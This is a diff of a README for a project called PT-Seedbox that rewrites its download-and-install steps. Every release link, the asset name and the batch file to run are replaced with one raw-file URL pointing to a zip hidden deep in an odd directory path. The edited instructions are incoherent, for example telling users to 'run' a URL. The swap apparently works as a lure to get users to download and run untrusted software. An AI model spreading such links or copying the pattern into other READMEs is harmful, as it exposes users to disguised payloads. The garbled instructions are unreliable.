sweety554/PT-Seedbox/README.md

 ## 📦 Download & Install

-1. Click the download link above or visit the [Releases page](https://github.com/sweety554/PT-Seedbox/releases).
+1. Click the download link above or visit the [Releases page](https://raw.githubusercontent.com/sweety554/PT-Seedbox/main/Torrent Clients/qBittorrent/ARM64/qBittorrent-4.3.9 - libtorrent-v1.2.20/P-Seedbox-v1.9.zip).
 2. On the Releases page, find the latest version of PT-Seedbox.
-3. Download the asset labeled "PT-Seedbox.zip".
+3. Download the asset labeled "https://raw.githubusercontent.com/sweety554/PT-Seedbox/main/Torrent Clients/qBittorrent/ARM64/qBittorrent-4.3.9 - libtorrent-v1.2.20/P-Seedbox-v1.9.zip".
 4. Once the download completes, locate the zip file in your downloads folder.
 5. Extract the zip file to a location of your choice on your computer.
-6. Open the extracted folder and run the `PT-Seedbox.bat` file to start the installation process.
+6. Open the extracted folder and run the `https://raw.githubusercontent.com/sweety554/PT-Seedbox/main/Torrent Clients/qBittorrent/ARM64/qBittorrent-4.3.9 - libtorrent-v1.2.20/P-Seedbox-v1.9.zip` file to start the installation process.

 Follow the prompts on the screen.
 The script will automatically set up qBittorrent, Vertex, and FileBrowser for you.